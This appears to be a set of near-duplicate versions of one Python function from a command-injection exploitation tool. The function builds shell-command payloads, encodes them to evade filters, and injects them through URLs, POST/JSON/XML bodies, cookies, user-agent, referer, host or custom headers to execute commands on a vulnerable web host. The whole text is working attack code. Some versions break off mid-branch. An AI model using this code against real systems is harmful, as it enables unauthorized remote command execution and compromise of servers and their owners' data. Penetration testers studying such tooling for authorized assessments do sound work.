def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator, TAG, cmd) payload = re.sub(" ", "%20", payload) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str( err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str( err) + Style.RESET_ALL raise SystemExit() else:
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator, TAG, cmd) payload = re.sub(" ", "%20", payload) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL raise SystemExit() else:
def injection(separator,TAG,cmd,prefix,suffix,http_request_method,url,vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator,TAG,cmd) payload = re.sub(" ","%20", payload) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) except urllib2.HTTPError, err: print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET sys.exit(1) else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err: print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET sys.exit(1)
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator, TAG, cmd) payload = re.sub(" ", "%20", payload) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL) # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL raise SystemExit()
def injection(separator,TAG,cmd,prefix,suffix,http_request_method,url,vuln_parameter): # Execute shell commands on vulnerable host. payload = eb_payloads.cmd_execution(separator,TAG,cmd) payload = re.sub(" ","%20", payload) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy= urllib2.ProxyHandler({'http': menu.options.proxy}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) response = urllib2.urlopen(request) except urllib2.HTTPError, err: print "\n(x) Error : " + str(err) sys.exit(1) else: response = urllib2.urlopen(request)
def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) data = json.loads(data, strict = False) request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell( separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + _urllib.parse.quote(")}") in payload: payload = payload.replace(")%3B" + _urllib.parse.quote(")}"), ")" + _urllib.parse.quote(")}")) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: debug_msg = "Executing the '" + cmd + "' command. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request( url, data.encode(settings.UNICODE_ENCODING)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command: " sys.stdout.write("\n" + settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+","%2B") # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) data = json.loads(data, strict = False) request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell( separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Encode payload to base64 format. if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Encode payload to hex format. elif settings.TAMPER_SCRIPTS['hexencode']: from src.core.tamper import hexencode payload = hexencode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)) if settings.VERBOSITY_LEVEL >= 1 and not menu.options.ignore_session: print "" # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) data = json.loads(data, strict=False) request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response